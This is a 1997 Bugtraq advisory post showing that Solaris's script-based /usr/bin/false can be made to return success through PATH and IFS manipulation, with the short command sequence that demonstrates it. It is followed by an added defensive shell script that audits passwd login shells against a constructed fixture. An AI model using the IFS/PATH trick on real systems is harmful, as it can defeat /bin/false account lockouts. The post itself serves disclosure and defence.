Bugtraq mailing list archives
Buggy /usr/bin shell scripts
From: obi () VIC20 DZP SE (obi () VIC20 DZP SE)
Date: Sat, 6 Dec 1997 13:31:01 +0100
This is old news, but it seems to be around still.

Solaris 2.5.1 and 2.6:

    $ ln -s /usr/bin/true /tmp/e
    $ PATH=/tmp IFS=x /usr/bin/false
    $ echo $?
    0

This combined with the habit of giving non-login accounts /bin/false as a shell feels dangerous.

Credits to Wilhelm Mueller for bringing it up in gnu.bash.bug in the sense of a security-related bug.
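An added audit sketch, not part of the original post: going by the subject line, /usr/bin/false on those releases is a shell script, so its result depends on the caller's environment. The function below lists passwd entries whose login shell is missing or is not a native ELF executable. The function names, the `root` prefix argument and the fixture are constructed for illustration, and an ELF platform is assumed.

```shell
#!/bin/sh
# Added example (not from the original post). Assumes an ELF platform.

# Print "user:shell:reason" for each account whose login shell is missing
# or is not a native ELF executable.
#   $1 = passwd-format file
#   $2 = optional root prefix (hypothetical, lets the check run on a test tree)
audit_shells() {
    passwd_file=$1
    root=${2:-}
    # IFS is set for this read only, so the caller's IFS is never trusted.
    while IFS=: read -r user _pw _uid _gid _gecos _home shell; do
        case $user in ''|'#'*) continue ;; esac
        [ -n "$shell" ] || continue        # empty field: system default shell
        path=$root$shell
        if [ ! -f "$path" ]; then
            echo "$user:$shell:missing"
            continue
        fi
        # First four bytes as hex; an ELF binary starts with 7f 45 4c 46.
        magic=$(dd if="$path" bs=1 count=4 2>/dev/null | od -An -tx1 | tr -d ' \n')
        [ "$magic" = "7f454c46" ] || echo "$user:$shell:not-elf"
    done < "$passwd_file"
}

# Constructed fixture: a script-style "false", an ELF header stub for sh,
# and three sample passwd entries. None of this is real system data.
demo_audit() {
    tmp=$(mktemp -d) || return 1
    mkdir -p "$tmp/usr/bin" "$tmp/bin"
    printf 'exit 255\n' > "$tmp/usr/bin/false"
    printf '\177ELF' > "$tmp/bin/sh"
    cat > "$tmp/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/sh
uucp:x:5:5:uucp:/var/spool/uucp:/usr/bin/false
ghost:x:99:99:ghost:/nonexistent:/usr/bin/nologin
EOF
    audit_shells "$tmp/passwd" "$tmp"
    rm -rf "$tmp"
}

demo_audit
```

On a live system the call would be `audit_shells /etc/passwd`; any account reported as `not-elf` has a login shell that is interpreted and therefore inherits variables such as PATH and IFS from whatever starts it.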